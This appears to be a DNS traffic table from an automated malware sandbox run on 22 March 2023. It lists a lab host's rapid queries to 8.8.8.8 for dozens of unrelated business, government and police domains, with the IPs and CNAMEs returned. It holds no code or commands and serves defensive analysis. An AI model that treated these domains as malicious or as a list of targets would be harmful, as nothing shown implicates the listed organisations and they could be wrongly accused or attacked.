                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.614640951 CET192.168.2.58.8.8.80xcfd5Standard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.617515087 CET192.168.2.58.8.8.80x527aStandard query (0)sgk.home.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.623511076 CET192.168.2.58.8.8.80xe9e4Standard query (0)fr-dat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.639300108 CET192.168.2.58.8.8.80x33e3Standard query (0)avse.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.645878077 CET192.168.2.58.8.8.80xb8cbStandard query (0)geecl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.658387899 CET192.168.2.58.8.8.80x625Standard query (0)kallman.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.658694983 CET192.168.2.58.8.8.80xbc28Standard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.687278986 CET192.168.2.58.8.8.80xf140Standard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.689063072 CET192.168.2.58.8.8.80x7232Standard query (0)nrsi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.719521046 CET192.168.2.58.8.8.80xc310Standard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.740189075 CET192.168.2.58.8.8.80xdf02Standard query (0)kallman.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.741146088 CET192.168.2.58.8.8.80x1b9aStandard query (0)coxkitchensandbaths.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.755702019 CET192.168.2.58.8.8.80x1cStandard query (0)pccj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.759718895 CET192.168.2.58.8.8.80xeb9bStandard query (0)vvsteknik.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.838159084 CET192.168.2.58.8.8.80x905bStandard query (0)any-s.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.838807106 CET192.168.2.58.8.8.80xc2fbStandard query (0)pleszew.policja.gov.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.839667082 CET192.168.2.58.8.8.80xa915Standard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.851681948 CET192.168.2.58.8.8.80x3194Standard query (0)semuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.864794016 CET192.168.2.58.8.8.80x5548Standard query (0)4locals.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.870074987 CET192.168.2.58.8.8.80x5238Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.881371975 CET192.168.2.58.8.8.80x5a4bStandard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.892676115 CET192.168.2.58.8.8.80x29f3Standard query (0)e-kami.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.893740892 CET192.168.2.58.8.8.80x4495Standard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.893934011 CET192.168.2.58.8.8.80xd596Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.894294977 CET192.168.2.58.8.8.80x81eeStandard query (0)shteeble.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.894781113 CET192.168.2.58.8.8.80xa673Standard query (0)absblast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.895203114 CET192.168.2.58.8.8.80x8d80Standard query (0)anduran.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.899118900 CET192.168.2.58.8.8.80x43b3Standard query (0)cpmteam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.925957918 CET192.168.2.58.8.8.80x5c88Standard query (0)mcseurope.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.926363945 CET192.168.2.58.8.8.80xd390Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.926548004 CET192.168.2.58.8.8.80xb04bStandard query (0)bosado.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.926609039 CET192.168.2.58.8.8.80xfcc9Standard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.926716089 CET192.168.2.58.8.8.80xb0efStandard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.926870108 CET192.168.2.58.8.8.80xe8a4Standard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.926908016 CET192.168.2.58.8.8.80x6e2fStandard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.927176952 CET192.168.2.58.8.8.80x8f72Standard query (0)sanfotek.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.931684017 CET192.168.2.58.8.8.80xd94Standard query (0)indonesiamedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.942821026 CET192.168.2.58.8.8.80x193bStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.972510099 CET192.168.2.58.8.8.80xdc55Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.977197886 CET192.168.2.58.8.8.80x9c24Standard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.015697002 CET192.168.2.58.8.8.80x2276Standard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.026818991 CET192.168.2.58.8.8.80xa5faStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.037919998 CET192.168.2.58.8.8.80xd868Standard query (0)wahw.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.064563036 CET192.168.2.58.8.8.80xae60Standard query (0)plaske.uaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.067502975 CET192.168.2.58.8.8.80x450eStandard query (0)nme.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.081348896 CET192.168.2.58.8.8.80x24ceStandard query (0)s5w.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.081348896 CET192.168.2.58.8.8.80x7abeStandard query (0)ludomemo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.081573009 CET192.168.2.58.8.8.80x5449Standard query (0)rappich.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.082040071 CET192.168.2.58.8.8.80xa5a4Standard query (0)any-s.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.101392984 CET192.168.2.58.8.8.80x9046Standard query (0)angework.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.141515970 CET192.168.2.58.8.8.80xf5d4Standard query (0)mcseurope.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.142051935 CET192.168.2.58.8.8.80x3d92Standard query (0)nts-web.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.147332907 CET192.168.2.58.8.8.80xd879Standard query (0)oh28ya.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.161564112 CET192.168.2.58.8.8.80xce3dStandard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.185296059 CET192.168.2.58.8.8.80xc2deStandard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.192397118 CET192.168.2.58.8.8.80x1253Standard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.208477974 CET192.168.2.58.8.8.80xe59fStandard query (0)fogra.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.208787918 CET192.168.2.58.8.8.80x95bdStandard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.224509954 CET192.168.2.58.8.8.80x609dStandard query (0)dhh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.240730047 CET192.168.2.58.8.8.80x8e90Standard query (0)lyto.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.256534100 CET192.168.2.58.8.8.80xab16Standard query (0)valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.283288002 CET192.168.2.58.8.8.80x6f9Standard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.317837954 CET192.168.2.58.8.8.80x4154Standard query (0)flamingorecordings.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.348881006 CET192.168.2.58.8.8.80x96f5Standard query (0)jsaps.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.381925106 CET192.168.2.58.8.8.80xad92Standard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.412197113 CET192.168.2.58.8.8.80x4824Standard query (0)strazynski.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.424192905 CET192.168.2.58.8.8.80x2848Standard query (0)jabian.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.427887917 CET192.168.2.58.8.8.80xb410Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.432751894 CET192.168.2.58.8.8.80x1e6aStandard query (0)forbin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.439450979 CET192.168.2.58.8.8.80x6828Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.444699049 CET192.168.2.58.8.8.80x9776Standard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.451853991 CET192.168.2.58.8.8.80xf4d8Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.475382090 CET192.168.2.58.8.8.80x72bStandard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.528743029 CET192.168.2.58.8.8.80xc90fStandard query (0)muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.530036926 CET192.168.2.58.8.8.80x54a9Standard query (0)cqdgroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.540128946 CET192.168.2.58.8.8.80x4efeStandard query (0)xsui.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.560765028 CET192.168.2.58.8.8.80x8dceStandard query (0)ldh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.589590073 CET192.168.2.58.8.8.80x592fStandard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.596828938 CET192.168.2.58.8.8.80x3135Standard query (0)univi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.604736090 CET192.168.2.58.8.8.80x34d6Standard query (0)top1oil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.619925976 CET192.168.2.58.8.8.80x88b4Standard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.622385025 CET192.168.2.58.8.8.80x3c7aStandard query (0)dbnet.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.628211021 CET192.168.2.58.8.8.80xefbbStandard query (0)www.muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.631015062 CET192.168.2.58.8.8.80xf4dfStandard query (0)bosado.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.640075922 CET192.168.2.58.8.8.80xd522Standard query (0)fogra.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.674989939 CET192.168.2.58.8.8.80x4163Standard query (0)karmy.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:07.960979939 CET8.8.8.8192.168.2.50xca67No error (0)www.olras.com80.93.82.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:07.965894938 CET8.8.8.8192.168.2.50x4836Name error (3)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:07.973515034 CET8.8.8.8192.168.2.50x9de1No error (0)www.quadlock.comquadlock.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:07.973515034 CET8.8.8.8192.168.2.50x9de1No error (0)quadlock.com70.39.251.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:07.981468916 CET8.8.8.8192.168.2.50x97b1No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:07.981468916 CET8.8.8.8192.168.2.50x97b1No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:07.983532906 CET8.8.8.8192.168.2.50x6411No error (0)www.dgmna.comdgmna.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:07.983532906 CET8.8.8.8192.168.2.50x6411No error (0)dgmna.com192.124.249.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:07.983673096 CET8.8.8.8192.168.2.50x3f9aNo error (0)www.jenco.co.uk172.67.208.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:07.983673096 CET8.8.8.8192.168.2.50x3f9aNo error (0)www.jenco.co.uk104.21.23.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:07.986581087 CET8.8.8.8192.168.2.50x8a1aServer failure (2)www.ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:08.075331926 CET8.8.8.8192.168.2.50xdf3cNo error (0)www.pdqhomes.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:08.075331926 CET8.8.8.8192.168.2.50xdf3cNo error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:08.075331926 CET8.8.8.8192.168.2.50xdf3cNo error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:08.075331926 CET8.8.8.8192.168.2.50xdf3cNo error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:08.197843075 CET8.8.8.8192.168.2.50x4d63No error (0)www.mqs.com.brwww.mqs.com.br.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:08.197843075 CET8.8.8.8192.168.2.50x4d63No error (0)www.mqs.com.br.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:08.197843075 CET8.8.8.8192.168.2.50x4d63No error (0)www.mqs.com.br.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:08.201308012 CET8.8.8.8192.168.2.50x270fNo error (0)www.rs-ag.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:08.201308012 CET8.8.8.8192.168.2.50x270fNo error (0)www.rs-ag.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:08.207735062 CET8.8.8.8192.168.2.50xeb12No error (0)www.pr-park.com118.27.125.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:08.209048986 CET8.8.8.8192.168.2.50x6b5No error (0)www.baijaku.combaijaku.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:08.209048986 CET8.8.8.8192.168.2.50x6b5No error (0)baijaku.com59.106.19.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:08.518682957 CET8.8.8.8192.168.2.50xcc11No error (0)www.item-pr.comitem-pr.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:08.518682957 CET8.8.8.8192.168.2.50xcc11No error (0)item-pr.com213.186.33.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:08.518682957 CET8.8.8.8192.168.2.50xcc11No error (0)item-pr.com185.15.129.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:08.630990028 CET8.8.8.8192.168.2.50x2523No error (0)www.alteor.clgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:08.630990028 CET8.8.8.8192.168.2.50x2523No error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:08.630990028 CET8.8.8.8192.168.2.50x2523No error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:08.635204077 CET8.8.8.8192.168.2.50x7923No error (0)www.valdal.com172.67.73.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:08.635204077 CET8.8.8.8192.168.2.50x7923No error (0)www.valdal.com104.26.6.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:08.635204077 CET8.8.8.8192.168.2.50x7923No error (0)www.valdal.com104.26.7.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:09.039813995 CET8.8.8.8192.168.2.50x71c7No error (0)www.vazir.se206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:09.069420099 CET8.8.8.8192.168.2.50x62bbNo error (0)www.depalo.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:09.069420099 CET8.8.8.8192.168.2.50x62bbNo error (0)ghs.googlehosted.com142.250.186.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:09.176588058 CET8.8.8.8192.168.2.50xca23No error (0)www.elpro.si172.67.70.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:09.176588058 CET8.8.8.8192.168.2.50xca23No error (0)www.elpro.si104.26.14.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:09.176588058 CET8.8.8.8192.168.2.50xca23No error (0)www.elpro.si104.26.15.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:09.194433928 CET8.8.8.8192.168.2.50xf497No error (0)www.credo.edu.pl62.122.190.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:09.204411983 CET8.8.8.8192.168.2.50xa754No error (0)www.nunomira.comnunomira.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:09.204411983 CET8.8.8.8192.168.2.50xa754No error (0)nunomira.com192.241.158.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:09.306082010 CET8.8.8.8192.168.2.50xfbfaNo error (0)www.petsfan.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:09.306082010 CET8.8.8.8192.168.2.50xfbfaNo error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:09.306082010 CET8.8.8.8192.168.2.50xfbfaNo error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:09.306082010 CET8.8.8.8192.168.2.50xfbfaNo error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:09.317389965 CET8.8.8.8192.168.2.50xb62cNo error (0)www.nelipak.nl82.201.61.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:09.420892954 CET8.8.8.8192.168.2.50xed35No error (0)www.otena.com99.83.154.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.103271961 CET8.8.8.8192.168.2.50x9358No error (0)www.transsib.comwww.studyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.103271961 CET8.8.8.8192.168.2.50x9358No error (0)www.studyrussian.comstudyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.103271961 CET8.8.8.8192.168.2.50x9358No error (0)studyrussian.com80.74.154.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.106583118 CET8.8.8.8192.168.2.50xb2baName error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.109081030 CET8.8.8.8192.168.2.50x86afNo error (0)www.tvtools.fi172.67.152.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.109081030 CET8.8.8.8192.168.2.50x86afNo error (0)www.tvtools.fi104.21.88.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.118983030 CET8.8.8.8192.168.2.50xf217No error (0)www.evcpa.comevcpa.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.118983030 CET8.8.8.8192.168.2.50xf217No error (0)evcpa.com192.124.249.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.135943890 CET8.8.8.8192.168.2.50xe873No error (0)www.edimart.hu81.2.194.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.145575047 CET8.8.8.8192.168.2.50x4b86No error (0)www.t-tre.com135.181.73.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.204384089 CET8.8.8.8192.168.2.50x5334Name error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.764200926 CET8.8.8.8192.168.2.50x6cd6No error (0)www.abart.plabart.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.764200926 CET8.8.8.8192.168.2.50x6cd6No error (0)abart.pl89.161.163.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.076168060 CET8.8.8.8192.168.2.50x2384No error (0)www.hummer.huhummer.huCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.076168060 CET8.8.8.8192.168.2.50x2384No error (0)hummer.hu185.80.51.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.084949970 CET8.8.8.8192.168.2.50x34c6No error (0)www.xaicom.esxaicom.esCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.084949970 CET8.8.8.8192.168.2.50x34c6No error (0)xaicom.es188.165.133.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.085522890 CET8.8.8.8192.168.2.50x9a4eNo error (0)www.naoi-a.com202.254.236.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.087640047 CET8.8.8.8192.168.2.50xe3c3No error (0)www.vexcom.com172.67.173.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.087640047 CET8.8.8.8192.168.2.50xe3c3No error (0)www.vexcom.com104.21.55.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.121471882 CET8.8.8.8192.168.2.50xee27No error (0)www.pcgrate.com172.67.201.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.121471882 CET8.8.8.8192.168.2.50xee27No error (0)www.pcgrate.com104.21.66.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.185759068 CET8.8.8.8192.168.2.50xe716No error (0)www.abdg.com192.252.154.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.210974932 CET8.8.8.8192.168.2.50xf397No error (0)www.cokocoko.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.210974932 CET8.8.8.8192.168.2.50xf397No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.210974932 CET8.8.8.8192.168.2.50xf397No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
